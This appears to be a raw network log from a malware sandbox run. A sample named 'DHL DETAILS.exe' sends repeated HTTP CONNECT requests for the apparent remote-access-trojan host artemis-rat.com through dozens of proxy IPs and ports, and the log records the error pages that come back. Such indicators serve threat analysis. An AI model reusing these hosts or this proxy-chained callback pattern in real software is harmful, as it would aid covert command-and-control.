Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1383	192.168.2.5	52127	45.195.149.79	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.695923090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1384	192.168.2.5	53238	67.201.59.70	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.720663071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1385	192.168.2.5	54024	94.45.74.60	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.727255106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1386	192.168.2.5	52712	120.78.191.68	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.727359056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.064563036 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:19.064747095 CET	318	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1387	192.168.2.5	54046	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.727911949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1388	192.168.2.5	52218	112.51.96.118	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.745417118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.456099033 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1389	192.168.2.5	52791	138.36.150.15	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.745420933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.567734003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1390	192.168.2.5	54027	91.202.230.219	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.753351927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1391	192.168.2.5	54044	138.36.199.14	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.769315958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1392	192.168.2.5	54312	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.771693945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1393	192.168.2.5	54130	172.67.181.58	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.771697044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.925715923 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1394	192.168.2.5	54314	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.773003101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1395	192.168.2.5	54316	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.774507999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1396	192.168.2.5	54320	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.776165009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1397	192.168.2.5	54117	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.776287079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1398	192.168.2.5	53193	192.111.137.35	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.779041052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1399	192.168.2.5	52759	103.146.137.5	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.781474113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1400	192.168.2.5	54037	93.90.212.2	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.788888931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1401	192.168.2.5	53770	117.160.250.163	9990	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.791241884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.505497932 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1402	192.168.2.5	54076	103.75.85.140	1111	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.791974068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536556959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.536883116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1403	192.168.2.5	54139	104.18.161.122	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.792121887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.946259975 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1404	192.168.2.5	54141	104.24.236.203	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.792965889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.947375059 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1405	192.168.2.5	52817	138.197.148.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.800947905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833414078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.833266973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.834053040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1406	192.168.2.5	54156	104.20.89.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.807368994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.962301016 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1407	192.168.2.5	54077	27.65.114.8	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.846880913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1408	192.168.2.5	52872	191.97.3.210	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.846935987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1409	192.168.2.5	54173	104.21.218.103	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.847017050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.001069069 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1410	192.168.2.5	54065	43.133.136.208	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.848982096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1411	192.168.2.5	54124	201.144.20.231	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
